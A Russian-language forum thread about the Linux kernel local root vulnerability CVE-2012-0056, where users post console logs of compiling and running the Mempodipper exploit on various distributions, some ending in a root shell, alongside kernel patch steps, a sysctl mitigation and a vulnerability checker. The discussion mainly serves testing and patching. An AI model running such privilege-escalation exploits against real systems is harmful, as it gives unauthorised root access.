=============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/13961/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [-] Could not resolve /bin/su. Specify the exit@plt function address manually. [-] Usage: /tmp/CVE-201209956 -o ADDRESS [-] Example: /tmp/CVE-201209956 -o 0x402178 Не работает на 3.0.4-hardened-r5, другого и не ожидал.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	168. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Пиу on 24-Янв-12, 17:09
	на обычной генте тоже не работает - /bin/su закрыт на чтение
	Ответить | Правка | ^ к родителю #128 | Наверх | Cообщить модератору

129. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от FiX лень логиниться on 24-Янв-12, 09:46
В арче запатчено: /var/abs/core/linux $ cat PKGBUILD |grep CVE-2012-0056         'CVE-2012-0056.patch')   # patch for CVE-2012-0056   patch -p1 -i "${srcdir}/CVE-2012-0056.patch"
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

131. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от EuPhobos (ok) on 24-Янв-12, 09:58
Дополнения к новости совсем не радуют.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	133. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от dAverk (??) on 24-Янв-12, 09:59
	> Дополнения к новости совсем не радуют. Какие именно? :D
	Ответить | Правка | ^ к родителю #131 | Наверх | Cообщить модератору

	164. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 15:50
	>> Дополнения к новости совсем не радуют. > Какие именно? :D То, что вместе с патчем в убунту прилетела новая дыра.
	Ответить | Правка | ^ к родителю #133 | Наверх | Cообщить модератору

	140. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Andrey Mitrofanov on 24-Янв-12, 10:46
	> Дополнения к новости совсем не радуют. Как ни странно, дополнение про Андроид может кого-то и порадовать: очередной иксплоит, чтоб разлочить (вдруг получится?) пошифку... Главное, _терпеть_ и не ставить FOTA (ф*инг обновления "по воздуху"). %) Держаться! (Хотя с другой стороны, на этих ваших телефонах какое-то 2.6.35+xyz. Когда ещё к нему приспособят...)
	Ответить | Правка | ^ к родителю #131 | Наверх | Cообщить модератору

135. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от artem (??) on 24-Янв-12, 10:16
Fedora 16. uname -a Linux notebook.blahblah 3.1.9-1.fc16.i686 #1 SMP Fri Jan 13 17:14:41 UTC 2012 i686 i686 i386 GNU/Linux $ ./a.out =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/4736/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x1524. [+] Calculating su padding. [+] Seeking to offset 0x1502. [+] Executing su with shellcode. [artem@notebook eatme]$ whoami artem Как-то так, в общем.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	139. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от AlexYeCu (ok) on 24-Янв-12, 10:45
	Опа. Может поэтому федоровцы и не шевелятся?
	Ответить | Правка | ^ к родителю #135 | Наверх | Cообщить модератору

	142. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от artem (??) on 24-Янв-12, 11:10
	Возможно, но вот что есть, то есть. не сработало оно у меня. :)
	Ответить | Правка | ^ к родителю #139 | Наверх | Cообщить модератору

	143. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
	Сообщение от Tav (ok) on 24-Янв-12, 11:22
	«Note: Fedora defaults to /proc/sys/kernel/randomize_va_space = 2, which makes this more difficult to exploit.» https://bugzilla.redhat.com/show_bug.cgi?id=782681
	Ответить | Правка | ^ к родителю #135 | Наверх | Cообщить модератору

136. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от SubGun (ok) on 24-Янв-12, 10:16
Сколько народу поскачивало эксплойт :DDD Надо бы туда вирусняк затолкать, чтобы веселей было.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	137. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от dAverk (??) on 24-Янв-12, 10:28
	> Сколько народу поскачивало эксплойт :DDD Надо бы туда вирусняк затолкать, чтобы веселей > было. Надо было. А то я зря сидел смотрел что оно делает в виртуалке, думал хоть бэкдур какой в комплекте идёт :(
	Ответить | Правка | ^ к родителю #136 | Наверх | Cообщить модератору

	138. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 24-Янв-12, 10:41
	а почитать исходник не судьбец, видимо.
	Ответить | Правка | ^ к родителю #137 | Наверх | Cообщить модератору

	141. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от dAverk (??) on 24-Янв-12, 10:48
	> а почитать исходник не судьбец, видимо. Читал, но всё равно для собственного спокойствия проверил :)
	Ответить | Правка | ^ к родителю #138 | Наверх | Cообщить модератору

	155. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от 57349817591 on 24-Янв-12, 14:12
	Неосилила настройку приоритетов репозиториев?
	Ответить | Правка | ^ к родителю #136 | Наверх | Cообщить модератору

149. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 24-Янв-12, 12:51
В Gentoo на 3.0.4-hardened-r4 не работает, на 3.0.6-gentoo - работает.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	171. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от vle (ok) on 24-Янв-12, 17:23
	> В Gentoo на 3.0.4-hardened-r4 не работает, на 3.0.6-gentoo - работает. На то он собственно и hardened. В том его задача.
	Ответить | Правка | ^ к родителю #149 | Наверх | Cообщить модератору

172. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 24-Янв-12, 17:26
А кто-нибудь может пояснить зачем вообще нужна поддержка записи в /proc/pid/mem ? Для чего её добавили ? Чтение ещё понятно, для отладки полезная вещь. Но для чего нужен доступ на запись в память другого процесса ?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	177. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 24-Янв-12, 21:34
	для scanmem, например.
	Ответить | Правка | ^ к родителю #172 | Наверх | Cообщить модератору

	196. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 01:21
	> для scanmem, например. Ну вот вынести в отдельный sysctl, чтоли. Надо далеко не всем, а потенциально - некислый источник дыр. Вообще, если юзер занят дебагом, защищаться от него довольно тухлое начинание.
	Ответить | Правка | ^ к родителю #177 | Наверх | Cообщить модератору

	197. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 25-Янв-12, 01:26
	> Ну вот вынести в отдельный sysctl, чтоли. новый патч так и делает, тащемта: «Add the "proc_pid_mem" sysctl to control whether or not /proc/pid/mem is allowed to work: 0: disabled, 1: read only, 2: read/write (default).»
	Ответить | Правка | ^ к родителю #196 | Наверх | Cообщить модератору

173. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Йоптик on 24-Янв-12, 19:24
ksodete@dev-tester ~/explo $ uname -a Linux dev-tester 3.1.5-gentoo #8 SMP Sun Jan 22 02:17:33 EET 2012 x86_64 Intel(R) Core(TM)2 Duo CPU E7300 @ 2.66GHz GenuineIntel GNU/Linux ksodete@dev-tester ~/explo $ whoami ksodete ksodete@dev-tester ~/explo $ gcc -o in mempodipper.c ksodete@dev-tester ~/explo $ ./in =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/12942/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Ptracing su to find next instruction without reading binary. [+] Resolved exit@plt to 0x402298. [+] Calculating su padding. [+] Seeking to offset 0x40227d. [+] Executing su with shellcode. sh-4.2# whoami root sh-4.2# rm -r /te.cpp sh-4.2# ... Бл***
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

174. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Йоптик on 24-Янв-12, 21:16
Негентушный способ для гентушников. Получилось закрыть дырку. Правда, сделал немного тупо, но ничего, работает. 1. # cd /usr/src/linux 2. nano 2100_proc-mem-handling-fix.patch 3. Копипастинг текста отсюда: http://sources.gentoo.org/viewcvs.py/gentoo-x86/sys-kernel/p... 4. ctrl + o 5. # cd fs/proc/ 6. # patch ../../2100_proc-mem-handling-fix.patch 7. # make && make modules_install 8. cp arch/<arch>/boot/bzImage /boot/kernel-<version>-gentoo 9. # reboot ksodete@dev-tester ~ $ ./in =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/4157/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Ptracing su to find next instruction without reading binary. [+] Resolved exit@plt to 0x402298. [+] Calculating su padding. [+] Seeking to offset 0x40227d. [+] Executing su with shellcode. ksodete@dev-tester ~ $ whoami ksodete ksodete@dev-tester ~ $
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	229. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Ващенаглухо (ok) on 27-Янв-12, 10:07
	что люди только не придумают,лишь бы не использовать hardened-sources
	Ответить | Правка | ^ к родителю #174 | Наверх | Cообщить модератору

175. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Йоптик on 24-Янв-12, 21:17
Ой, сори-сори ---6. # patch ../../2100_proc-mem-handling-fix.patch +++6. # patch -i ../../2100_proc-mem-handling-fix.patch
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

198. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Sw00p aka Jerom on 25-Янв-12, 01:31
на RHEL старом ваще не компилится ))) 2.6.18-8.el5 ругается на pipe2 (заменил на пайп всё равно не работает - висит на чтении) =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Ptracing su to find next instruction without reading binary. [+] Creating ptrace pipe. [+] Forking ptrace child. [+] Ptrace_traceme'ing process. [+] Waiting for ptraced child to give output on syscalls. --------------- скачал под федору эксплоит с использованием не su а gpasswd - тоже не сработал - даже отрубил  ASLR =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/3593/mem in child. [+] Sending fd 6 to parent. [+] Received fd at 6. [+] Assigning fd 6 to stderr. [+] Reading gpasswd for exit@plt. [+] Resolved exit@plt to 0x8049900. [+] Calculating gpasswd padding. [+] Seeking to offset 0x80498f1. [+] Executing gpasswd with shellcode. unknown group: 1۰1۰.1ɳ?1�hn/shh//bi��-iR��PS��0 gpasswd: Permission denied
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	199. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от arisu (ok) on 25-Янв-12, 01:33
	во-первых: сказали же: 2.6.39. во-вторых: если > ругается на pipe2 препятствие — лучше никогда ничего не компилируй больше.
	Ответить | Правка | ^ к родителю #198 | Наверх | Cообщить модератору

	200. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Sw00p aka Jerom on 25-Янв-12, 01:43
	>>препятствие — лучше никогда ничего не компилируй больше. спасибо за совет - поэтому я три года не апдейтил редхат ))) вот лучше этим проверьте а не эксплоиты запускайте http://grsecurity.net/~spender/correct_proc_mem_reproducer.c write: Invalid argument not vulnerable
	Ответить | Правка | ^ к родителю #199 | Наверх | Cообщить модератору

	201. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 25-Янв-12, 01:56
	> вот лучше этим проверьте а не эксплоиты запускайте а зачем мне этот странный код? как будто я не понял, что делает сплойт, как, зачем и почему. кстати, красиво. и да, патч-лечилку я себе на 3.1.5 уже бэкпортанул (нет, я не хочу ядро новее).
	Ответить | Правка | ^ к родителю #200 | Наверх | Cообщить модератору

	204. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Sw00p aka Jerom on 25-Янв-12, 02:21
	бэээээээээээ старый либси ))
	Ответить | Правка | ^ к родителю #201 | Наверх | Cообщить модератору

	205. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Йоптик (ok) on 25-Янв-12, 03:16
	Вот и у меня подобная ситуация: качать ядро 3.2.x (>70 МБ) через GPRS в 3 кб/с с пингом >5000 мс не хочется, а если после патчинга ядра компьютер не посыпится/сгорит/заговорит_человеческим_голосом, то почему бы и не пропатчить вручную? =)
	Ответить | Правка | ^ к родителю #201 | Наверх | Cообщить модератору

	207. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 25-Янв-12, 03:43
	ну, на 3.1.5 патч просто так не ложится, надо немного знать, что там в ведре творится и подпилить. или просто вкорячить жестокий r/o на /proc/pid/mem (что я и сделал, тащемта, особо не напрягаясь).
	Ответить | Правка | ^ к родителю #205 | Наверх | Cообщить модератору

	213. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Йоптик (ok) on 25-Янв-12, 04:19
	<offtop> Жёстко =) Я тоже подумывал сделать /proc/pid/mem ридонли, но передумал, авось это чем-то чревато. Если  было бы всё так просто, то в качестве решения написали бы в именно ограничение прав на /proc/pid/mem. Тем более, я вообще не знал, что можно было наложить патч на ядро с помощью patch -i file.patch, находясь в папке с файлом, который надо пропатчить. Но так как я люблю тыкать пальцем в небо - сделал так, как и написал в посте 1.174 (или как они нумеруются, не пойму). </offtop>
	Ответить | Правка | ^ к родителю #207 | Наверх | Cообщить модератору

	214. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 25-Янв-12, 04:55
	> Я тоже подумывал сделать /proc/pid/mem ридонли, но передумал, авось это чем-то чревато. да пофигу, в принципе. то есть, у «средниего юзера» ничего не сломается. ага, то патч без нового sysctl. для него «чекер» не подходит, там другой принцип закрытия дырки. доверяй только сплойту. %-)
	Ответить | Правка | ^ к родителю #213 | Наверх | Cообщить модератору

	206. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Йоптик (ok) on 25-Янв-12, 03:22
	ksodete@dev-tester ~/explo $ gcc -o cp cp.c ksodete@dev-tester ~/explo $ ./cp vulnerable Да, пичяль-пичялюшка-пичялька, и это даже после патчинга /usr/src/linux/fs/proc/base.c Единственное, что я, тупак в C/C++ и арх. ядра, могу сказать, это "посмотрим, шо будет дальше".
	Ответить | Правка | ^ к родителю #200 | Наверх | Cообщить модератору

	208. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 25-Янв-12, 03:44
	> Да, пичяль-пичялюшка-пичялька, и это даже после патчинга /usr/src/linux/fs/proc/base.c sysctl -w kernel.proc_pid_mem=1 сделал? по-умолчанию всё разрешено.
	Ответить | Правка | ^ к родителю #206 | Наверх | Cообщить модератору

	209. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Йоптик (ok) on 25-Янв-12, 04:07
	Честно говоря - не делал. Ответ команды: # error: "kernel.proc_pid_mem" is an unknown key если сделал что-то не так - сори, значит просто не понял вопрос.
	Ответить | Правка | ^ к родителю #208 | Наверх | Cообщить модератору

	210. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 25-Янв-12, 04:08
	> Честно говоря — не делал. > Ответ команды: > # error: «kernel.proc_pid_mem» is an unknown key > если сделал что-то не так — сори, значит просто не понял вопрос. или неверно наложил патч (наложил не весь/патч не наложился), или забыл ребутнуться в новое ядро, или я не знаю. %-)
	Ответить | Правка | ^ к родителю #209 | Наверх | Cообщить модератору

	212. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Йоптик (ok) on 25-Янв-12, 04:17
	Скорее всего первое, ибо я параноидально, после каждого рекомпилинга ядра, делаю cp arch/<arch>/boot/bzImage в папку /boot с заменой оригинального ядра. Но спасибо за помощь) А то я вообще в линуксах сравнительно недавно, в генту - ещё "недавнее", да и школотятских мозгов на всё не хватает.
	Ответить | Правка | ^ к родителю #210 | Наверх | Cообщить модератору

	215. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 25-Янв-12, 04:56
	доверяй сплойту, не доверяй «чекеру». гентушный патч по логике не такой, как из LKML. так что проверяй именно запуском сплойта.
	Ответить | Правка | ^ к родителю #212 | Наверх | Cообщить модератору

	216. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Йоптик (ok) on 25-Янв-12, 16:13
	> доверяй сплойту, не доверяй «чекеру». гентушный патч по логике не такой, как > из LKML. так что проверяй именно запуском сплойта. Кстати, Вы оказались абсолютно правы =) Дело в том, что я накладывал патч от Линуса Торвальдса — тот самый, от 21-го числа, а не новый, с возможностю выбора трёх вариантов, поэтому и команда не сработала, поэтому и чекер говорит "vulnerable". Тем не менее, как факт, эксплойт уже не срабатывает. Так что это я ступил, сори ^_^"
	Ответить | Правка | ^ к родителю #215 | Наверх | Cообщить модератору

	219. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
	Сообщение от arisu (ok) on 25-Янв-12, 19:42
	да ерунда, не всем же ядерными хакерами быть. заработало (точнее, не заработало %-) — и хорошо. а вот некоторым полезно бы не выкладывать «чекеры», которые на самом деле проверяют вовсе не то, что надо. если интересно — то: гентушный патч делает финт хвостом, разрешая писать не совсем в ту VM, в которую ожидается (в отличие от нового, который тупо право записи отбирает). поэтому «недочекер» и говорит, что "уязвимо": у него выходит записать *в свою же* VM. а вот у сплойта в чужую — уже не выходит, и потому сплойт не работает.
	Ответить | Правка | ^ к родителю #216 | Наверх | Cообщить модератору

	220. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Sw00p aka Jerom on 25-Янв-12, 23:15
	>>а вот некоторым полезно бы не выкладывать «чекеры», которые на самом деле проверяют вовсе не то, что надо. вы сначало на домен в сылке посмотрите потом тут из себя гуру стройте пс: от вас я пока не увидел ни чекера ни сплоита, ни даже описания работы эксплоита пс2: представляю как вы на продакшен сервере будете без чекера проверять поддверженность уязвимости, или вы собирались запускать эксплоит О_О ?
	Ответить | Правка | ^ к родителю #219 | Наверх | Cообщить модератору

	222. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
	Сообщение от arisu (ok) on 26-Янв-12, 00:09
	> вы сначало на домен в сылке посмотрите потом тут из себя гуру > стройте и что я должен увидеть в имени домена? или сразу начинать бить земные поклоны? > пс: от вас я пока не увидел ни чекера ни сплоита, ни > даже описания работы эксплоита а зачем мне повторять то, что уже сделано? подробнейшее же описание есть в блоге автора сплойта; если кто-то не умеет читать по-английски — то ему однозначно описание не нужно. > пс2: представляю как вы на продакшен сервере будете без чекера проверять поддверженность > уязвимости, или вы собирались запускать эксплоит О_О ? не только «собрался», но и запускаю. потому что в отличие от тебя я полностью понимаю его код и принцип работы. а вот таких как ты к «продакшену» лучше не допускать, да. во избежание.
	Ответить | Правка | ^ к родителю #220 | Наверх | Cообщить модератору

	226. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Sw00p aka Jerom on 26-Янв-12, 14:05
	>>не только «собрался», но и запускаю. удачи вам ))
	Ответить | Правка | ^ к родителю #222 | Наверх | Cообщить модератору

	227. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
	Сообщение от arisu (ok) on 26-Янв-12, 14:40
	> удачи вам )) удача нужна тем, кто совершает шаманские действия не понимая их смысла. я к таким не отношусь.
	Ответить | Правка | ^ к родителю #226 | Наверх | Cообщить модератору

223. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 26-Янв-12, 02:53
подскажите пожалуйста как в debian закрыть багу? apt-get install -y systemtap linux-image-$(uname -r)-dbg выдает ошибку '('
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

224. "На слаке работает"	+/–
Сообщение от ozs (ok) on 26-Янв-12, 03:27
Slackware GNU/Linux kernel-3.0.17 Intel(R) Core(TM)2 Duo CPU ./mempodipper =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Ptracing su to find next instruction without reading binary. [+] Creating ptrace pipe. [+] Forking ptrace child. [+] Waiting for ptraced child to give output on syscalls. [+] Ptrace_traceme'ing process. [+] Error message written. Single stepping to find address. [+] Resolved call address to 0x80499e8. [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/2695/mem in child. [+] Sending fd 6 to parent. [+] Received fd at 6. [+] Assigning fd 6 to stderr. [+] Calculating su padding. [+] Seeking to offset 0x80499dc. [+] Executing su with shellcode. sh-4.1# test sh-4.1# id uid=0(root) gid=0(root) groups=0(root)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

228. "Помогите!!!"	+/–
Сообщение от Аноним (??) on 27-Янв-12, 08:39
Я новичок в этом деле. Кто-нибудь, помогите!!! Пытался по всякому с шелкодами и эксплойтами. Не получилось((. Напишите, плиз, какие именно действия надо сделать и какие скрипты запустить. Буду очень благодарен. ядро: uname -a Linux localhost.localdomain 2.6.32-220.el6.i686 #1 SMP Tue Dec 6 16:15:40 GMT 2011 i686 i686 i386 GNU/Linux.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	230. "Помогите!!!"	+/–
	Сообщение от Йоптик (ok) on 27-Янв-12, 14:17
	Эм... Во-первых, в новости написано: > Проблема наблюдается, начиная с ядра 2.6.39 Во вторых, я так и не пойму, что у тебя в целях? Запустить сплойт? А зачем?
	Ответить | Правка | ^ к родителю #228 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема